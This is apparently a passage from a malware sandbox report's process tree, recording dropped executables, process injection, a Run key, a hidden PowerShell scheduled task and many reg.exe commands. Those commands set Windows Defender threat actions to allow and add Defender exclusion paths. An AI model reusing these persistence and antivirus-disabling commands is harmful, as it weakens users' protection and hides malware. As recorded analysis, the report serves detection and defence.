                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jwzeqsilllyafcnn.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\jwzeqsilllyafcnn.exe"
                                                                                                                                                          1⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:4040
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\WindowsApps\Get-Variable.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Microsoft\WindowsApps\Get-Variable.exe"
                                                                                                                                                            2⤵
                                                                                                                                                              PID:4668
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\signed.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\signed.exe"
                                                                                                                                                                3⤵
                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                PID:3916
                                                                                                                                                                • C:\ProgramData\MsDrvSrvc.exe
                                                                                                                                                                  "C:\ProgramData\MsDrvSrvc.exe"
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:1524
                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                /create /tn COMSurrogate /st 00:00 /du 9999:59 /sc once /ri 1 /f /tr "powershell.exe -windowstyle hidden"
                                                                                                                                                                2⤵
                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                PID:1524
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\6DF1.exe
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\6DF1.exe
                                                                                                                                                              1⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Checks computer location settings
                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                              PID:3204
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe
                                                                                                                                                              1⤵
                                                                                                                                                                PID:804
                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 804 -s 484
                                                                                                                                                                  2⤵
                                                                                                                                                                  • Program crash
                                                                                                                                                                  PID:6220
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7BCD.exe
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7BCD.exe
                                                                                                                                                                1⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                PID:3484
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\nijiccssjnaevyew.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\nijiccssjnaevyew.exe"
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:4052
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\8AF1.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\8AF1.exe
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                                  PID:3624
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\987E.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\987E.exe
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:4404
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4404 -s 340
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Program crash
                                                                                                                                                                      PID:5288
                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:2448
                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2448 -s 872
                                                                                                                                                                        2⤵
                                                                                                                                                                        • Program crash
                                                                                                                                                                        PID:4332
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 2448 -ip 2448
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:6104
                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 4404 -ip 4404
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:5744
                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                          C:\Windows\explorer.exe
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:3548
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\CE07.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\CE07.exe
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                            PID:4944
                                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:4344
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\EF2C.exe
                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\EF2C.exe
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:3936
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\EF2C.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\EF2C.exe
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                  PID:1088
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\F576.exe
                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\F576.exe
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                PID:4904
                                                                                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:109088
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\F7E8.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\F7E8.exe
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:13680
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\FB35.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\FB35.exe
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:24408
                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                                                                        PID:65352
                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 24408 -s 1132
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Program crash
                                                                                                                                                                                        PID:65324
                                                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:24400
                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                        C:\Windows\explorer.exe
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:41600
                                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:58704
                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 24408 -ip 24408
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:65492
                                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                                              C:\Windows\explorer.exe
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:64960
                                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:65252
                                                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:73132
                                                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:72848
                                                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                                                      C:\Windows\explorer.exe
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:85472
                                                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:99312
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW\EdLqPAaTytMGRMX\SVjvbHJ.exe
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW\EdLqPAaTytMGRMX\SVjvbHJ.exe bH /site_id 525403 /S
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                                                          PID:109108
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                            PID:1464
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:4660
                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  PID:4052
                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:5200
                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:900
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:544
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:536
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:4416
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:5892
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:5136
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:4324
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:5748
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:4824
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:5604
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:5700
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:4008
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:2464
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:1468
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:2448
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:5608
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:3228
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:2284
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                        PID:5288
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:1884
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:3260
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                              PID:2028
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QwrkXrSOGBVCC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QwrkXrSOGBVCC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iNyCImZcmuwfbRRHWCR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iNyCImZcmuwfbRRHWCR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qtzXYlPxPmUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qtzXYlPxPmUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uyPuAlXAcIBU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uyPuAlXAcIBU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wKAtYsCOU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wKAtYsCOU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\OsVMcSWGRXGXAxVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\OsVMcSWGRXGXAxVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IIxDORIMmvvtwMVt\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IIxDORIMmvvtwMVt\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                            PID:4672
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QwrkXrSOGBVCC" /t REG_DWORD /d 0 /reg:32
        3⤵
        PID:6068
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QwrkXrSOGBVCC" /t REG_DWORD /d 0 /reg:32
          4⤵
          PID:1292
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QwrkXrSOGBVCC" /t REG_DWORD /d 0 /reg:64
        3⤵
        PID:5804
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iNyCImZcmuwfbRRHWCR" /t REG_DWORD /d 0 /reg:32
        3⤵
        PID:5820
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iNyCImZcmuwfbRRHWCR" /t REG_DWORD /d 0 /reg:64
        3⤵
        PID:2480
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qtzXYlPxPmUn" /t REG_DWORD /d 0 /reg:32
        3⤵
        PID:1648
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qtzXYlPxPmUn" /t REG_DWORD /d 0 /reg:64
        3⤵
        PID:6100
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uyPuAlXAcIBU2" /t REG_DWORD /d 0 /reg:32
        3⤵
        PID:4200
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uyPuAlXAcIBU2" /t REG_DWORD /d 0 /reg:64
        3⤵
